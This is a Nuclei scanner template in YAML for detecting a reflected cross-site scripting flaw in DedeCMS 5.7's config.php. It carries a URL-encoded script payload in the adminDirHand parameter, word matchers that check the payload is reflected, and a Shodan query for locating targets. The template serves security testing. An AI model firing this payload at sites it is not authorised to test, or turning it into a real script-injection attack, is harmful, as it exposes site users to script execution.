nuclei-templates/vulnerabilities/dedecms/dedecms-config-xss.yaml

44 lines
1.2 KiB
YAML

id: dedecms-config-xss
info:
name: DedeCMS 5.7 - Cross-Site Scripting
author: ritikchaddha
severity: high
description: |
DeDeCMS 5.7 contains a cross-site scripting vulnerability in the '/include/dialog/config.php' file. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
reference:
- https://www.zilyun.com/8665.html
- https://www.60ru.com/161.html
- https://www.cnblogs.com/milantgh/p/3615853.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.html:"DedeCms"
tags: dedecms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "location='../../</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/15